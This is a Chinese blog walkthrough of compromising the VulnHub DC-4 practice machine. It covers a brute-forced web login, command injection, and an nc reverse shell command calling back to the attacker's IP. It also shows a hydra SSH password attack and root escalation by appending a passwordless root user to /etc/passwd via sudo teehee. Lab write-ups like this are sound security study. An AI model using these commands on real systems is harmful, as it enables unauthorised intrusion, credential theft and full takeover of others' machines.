目录
一、实验环境
1.1 攻击机Kali
(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式
(2)Kali的IP地址为192.168.101.130
1.2 靶机下载
(1)下载地址: DC: 4 ~ VulnHub
(2)通过上述简介可以知道,此靶机只有一面旗帜,但有多个入口点。
(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式
(4)开启靶机
1.3 工具准备
- BurpSuite
- 用户名和密码的渗透字典
- hydra
二、站点信息收集
2.1 IP扫描
使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.150
2.2 端口扫描
(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口
(2)访问80端口,是一个登录界面
2.3 目录扫描
使用dirsearch工具对网站目录进行扫描,没有什么其他的发现,都需要先进行登录
三、漏洞利用
3.1 暴力破解
(1)在登录页面输入随机的用户名和密码,打开burpsuite进行抓包
(2)将抓到的数据包发送到Intruder
(3)设置爆破类型为Cluster bomb,添加爆破点username和password
(4)为用户名和密码上传常见的字典并开始爆破
(5)成功得到用户名和密码admin|happy
3.2 命令执行
(1)使用爆破出来的数据进行登录,登录页面如下,点击Command
(2)选择List Files,点击run,回显命令ls -l和命令执行的结果
(3)使用burpsuite进行抓包,在ls+-l处尝试命令注入
(4)将数据包发送到Repeater
(5)在数据包的ls -l处写入命令whoami,点击send,发现网页执行了该命令,存在命令执行漏洞
四、权限提升
4.1 nc反弹shell
(1)在kali中开启监听
(2)在数据包中写入nc反弹shell命令,点击send,命令执行成功
nc -e /bin/bash 192.168.101.130 5555 //空格用+替换
(3)kali监听成功
4.2 收集信息
(1)使用脚本获得一个交互式的webshell
python -c 'import pty;pty.spawn("/bin/bash")'
(2)在/home/jim目录下发现一个old-passwords.bak文件,可能是jim用户之前使用过的旧密码,查看该文件
(3)另外两个用户charles和sam目录下没有什么东西
(4)将刚刚old-passwords.bak文件中的密码保存到一个passwd.txt文件中
(5)使用hydra工具进行爆破,爆破成功
hydra -l jim -P /home/kali/Desktop/渗透字典/passwd.txt -t 10 ssh://192.168.101.150
(6)使用爆破出来的密码进行登录,这里提示我们有一封邮件
(7)去邮件目录下查看内容,发现charles用户的密码^xHhA&hvim0y
(8)切换到charles用户,登录成功
4.3 teehee提权
(1)由于charles目录下没有什么有用的东西,查看可以执行的root权限的命令
teehee 是一个非常小型的文本编辑器,通常用于 Linux 系统中的命令行环境。它的功能和操作方式类似于其他命令行文本编辑器,不具备像 vim 或 nano 那样丰富的功能和扩展性。它的目的是为用户提供一个快速、直观的编辑工具,适合需要快速修改文本文件的场景。
(2)利用管道符配合teehee命令,在passwd文件里写入一个不用密码的root权限的用户awuawu,并切换用户
echo 'awuawu::0:0:::/bin/bash' | sudo teehee -a /etc/passwd //-a表示将内容追加到文件末尾
(3)提权成功,查看flag
声明
1.本博客文章均为博主日常学习原创内容,转载请注明出处。
2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。
3.希望以上的学习经验分享能对您有所帮助。
4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。